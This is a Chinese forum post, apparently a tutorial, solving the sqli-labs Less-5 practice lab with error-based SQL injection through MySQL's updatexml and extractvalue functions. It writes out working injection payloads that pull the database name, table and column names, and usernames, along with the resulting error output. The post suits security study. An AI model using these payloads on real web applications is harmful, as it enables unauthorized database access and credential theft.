基于sqli-labs Less-5 sql报错注入详解

干翻全岛蛙蛙  金牌会员 | 2024-9-17 15:14:18 | 来自手机 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 887|帖子 887|积分 2661

按照之前的思路发现,是正常的'闭合的字符型,但是在联合注入0' union select 1,2,3--+没有回显注入点,只是回显You are in,因此无法使用联合注入,思量使用报错注入或者盲注。
思量到本题会给出数据库的错误信息,且盲注比较麻烦,实行使用报错注入
1. 报错注入函数简介

1.1 updatexml函数

UPDATEXML 是 MySQL 中的一个 XML 函数,用于解析 XML 数据并返回效果。
UPDATEXML(xml_target, xpath_expr, new_xml)

  • xml_target:要操作的 XML 文档。
  • xpath_expr:一个字符串,表示 XPath 表达式,用于指定要更新的节点。
  • new_xml:要替换的新的 XML 内容。
在SQL注入中,不妨把他简化为updatexml(xx,concat(xx),xx),concat函数用来拼接字符,当第二个参数为非xpath格式就会把校验失败的数据爆出来。由于要的只是第二个参数,一三随便写即可
1.2 extractvalue函数

EXTRACTVALUE 是 MySQL 中的一个函数,用于从 XML 文档中提取指定的值。该函数使用 XPath 表达式从 XML 数据中选择和返回节点的文本内容。
EXTRACTVALUE(xml_frag, xpath_expr)

  • xml_frag:包含 XML 数据的字符串。
  • xpath_expr:一个字符串,表示 XPath 表达式,用于指定要提取的节点。
在SQL注入中,不妨把他简化为extractvalue(xx,concat(xx)),concat函数用来拼接字符,当第二个参数为非xpath格式 就会把校验失败的数据爆出来。由于要的只是第二个参数,参数一随便写即可。
2. updatexml报错

0x7e为~,方便我们在报错回显中找到数据。
通过拼接必要的内容作为路径,报错后路径被爆出,从而得到数据。
  1. ?id=1' and updatexml(1,concat(0x7e,(select database() ),0x7e),1) --+
  2. '回显:XPATH syntax error: '~security~'
  4. ?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' ),0x7e),1) --+
  5. '回显:XPATH syntax error: '~emails,referers,uagents,users~'
  7. ?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e),1)--+
  8. '回显:XPATH syntax error: '~id,username,password~'
  10. ?id=1' and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1)--+
  11. '回显:XPATH syntax error: '~Dumb,Angelina,Dummy,secure,stup'
复制代码
3. extractvalue报错

通过拼接必要的内容作为路径,报错后路径被爆出,从而得到数据。
  1. ?id=1' and extractvalue(1,concat(0x7e,(select database() ),0x7e))--+
  2. '回显:XPATH syntax error: '~security~'
  4. ?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' ),0x7e))--+
  5. 'XPATH syntax error: '~emails,referers,uagents,users~'
  7. ?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e))--+
  8. 'XPATH syntax error: '~id,username,password~'
  10. ?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username) from security.users),0x7e))--+
  11. 'XPATH syntax error: '~Dumb,Angelina,Dummy,secure,stup'
复制代码
宇宙安全声明

本博客所提供的内容仅供学习与交换目的,所有文章、代码及相干资料仅用于提升网络安全知识水平。博主不对任何人因使用博客中提到的技能或工具而产生的任何后果负责。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

干翻全岛蛙蛙

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表